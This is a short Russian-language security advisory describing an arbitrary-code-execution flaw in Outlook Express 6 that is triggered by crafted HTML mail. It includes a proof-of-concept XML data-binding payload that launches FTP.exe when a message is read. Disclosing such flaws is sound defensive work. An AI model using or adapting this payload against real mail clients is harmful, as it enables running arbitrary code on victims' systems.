Уязвимость обнаружена в Microsoft Outlook Express. Удаленный пользователь может послать специально сформированное HTML почтовое сообщение или новость, чтобы выполнить произвольный код на системе пользователя.

Сообщается, что этот недостаток может быть связан с недостатком, первоначально описанным в MS02-015 и затрагивающим Internet Explorer. Однако обнаруженная уязвимость работает со всеми установленными заплатками от MS. 

Пример (запускает FTP.exe на системе пользователя при попытке прочитать сообщение в Internet
Zone (не по умолчанию!): 

<xml id=oExec> <security><exploit> <![CDATA[ <object id=»oFile» 
classid=»clsid:11111111-1111-1111-1111″ 
codebase=»C:\WINDOWS\FTP.EXE»></object>]]></exploit></security></xml>
<SPAN dataFld=exploit dataFormatAs=html 
dataSrc=#oExec></SPAN>

Уязвимость обнаружена в Microsoft Outlook Express 6.



Оставить мнение